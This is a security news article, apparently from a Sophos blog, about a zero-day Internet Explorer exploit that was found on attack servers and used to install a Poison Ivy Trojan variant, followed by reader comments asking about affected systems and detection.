New IE zero day exploit circulating, used to install Poison Ivy

Filed Under: Adobe, Featured, Internet Explorer, Vulnerability

Poison Ivy. Image from ShutterstockThe gang behind the recent Java zero day attacks apparently hasn't packed up for the season.

A researcher examining one of the servers used to launch attacks on vulnerable Java installations says he has found a new zero day exploit for Microsoft's Internet Explorer web browser.

The new and previously unknown (or "zero day") exploit can be used to load malicious software on machines running fully patched Windows XP SP3 along with the latest editions of the IE 7 and IE 8 browser and Adobe's Flash software, said Eric Romang, who discovered the vulnerability.

Further analysis by the firm AlienVault suggests that the zero day is being used in attacks that install the Poison Ivy Trojan.

In a blog post, Romang, a Luxemborg-based IT security advisor at, said he discovered the exploit when analyzing a batch of files hosted on one of the servers used by the Nitro gang to distribute attacks that exploited the Java vulnerability.

After running one of the sample files on a fully patched Windows XP SP3 system with an up-to-date version of Adobe Flash, Romang was surprised to find that the files loaded malicious software to his fully patched XP system.

IE 7Further analysis revealed that .html and Flash files were used to identify proper targets (Windows XP systems running IE 7 and 8) and use a common technique called a "heap spray" to lay the groundwork for a successful iFrame attack against the systems that exploited the vulnerability and used it to install a malicious program, 111.exe.

That malware has been identified as a new variant of the Posion Ivy Trojan horse program, according to the security firm AlienVault Labs.

Writing about the attack on the AlienVault Labs blog, researcher Jaime Blasco said that evidence collected online suggest the gang behind the Java attacks in August and September may be moving on: with domains used in that attack located at new IP addresses and serving up the new and more potent attacks.

Oracle issued an emergency patch for the vulnerability in Java on August 30, though researchers subsequently showed that the patch could be circumvented.

The new IE exploit is being implemented in the Metasploit penetration testing tool and a module that allows Metasploit users to launch IE 7 and IE8 exploit is expected by Monday, Romang wrote.

(Customers should note that Sophos products protect against the vulnerability detecting attempts to exploit it as Exp/20124969-A - however, we would still recommend that IE users apply the security patch as soon as it is released by Microsoft).

Poison Ivy image from Shutterstock.

, , , , , , , , , , , , , , , , ,

You might like

17 Responses to New IE zero day exploit circulating, used to install Poison Ivy

  1. Tyw7 · 1111 days ago

    Is Windows 7 or Windows 8 affected?

  2. Sleepy · 1111 days ago

    Has this been assigned a CVE yet?

    • JimboC · 1111 days ago

      Hi Sleepy,

      Since this is a Zero day vulnerability, it has not yet been assigned a CVE.


  3. essjay · 1111 days ago

    Are machines running with sophos being protected by this vulnerability

    • tim · 1111 days ago

      Would really like to know the answer to this as well!

    • Graham Cluley · 1111 days ago

      Sophos products detect malware we have seen using the exploit as Troj/SWFDL-G, Troj/SWFDL-H and Troj/SWFDL-I.

  4. JimboC · 1111 days ago


    Please follow the recommended advice (see Suggested Actions and Additional Suggested Actions) in the following Microsoft Security Advisory to help protect you from this threat:

    I hope this helps. Thanks.

  5. Tipper · 1111 days ago

    Why don't Sophos post, in the original article, that Sophos products detects this?
    It is much better doing it that way, instead of a comment, way down below the article...
    Just a suggestion. :-)

  6. Nawaqua · 1111 days ago

    Poison Ivy only works on Windows XP and before

    • JimboC · 1110 days ago

      Unfortunately it is not just Poison Ivy being used any more as the malware that gets downloaded once your PC is exploited. Please the see following article from Kaspersky about the new exploits that have been developed and the payload they drop:


  7. John · 1110 days ago

    Sounds like poison ivy was created by MS to get people off of XP

Leave a Reply

Fill in your details below or click an icon to log in: Logo

You are commenting using your account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s

About the author

Paul is a Boston-based reporter and industry analyst with more than a decade of experience covering the IT industry, cyber security and hacking. His work has appeared on, The Boston Globe,, NPR's Marketplace, Fortune Small Business, as well as industry publications including ZDNet, Computerworld, InfoWorld, eWeek, CIO , CSO and Paul got his 15 minutes as an expert guest on The Oprah Show - but that's a long story.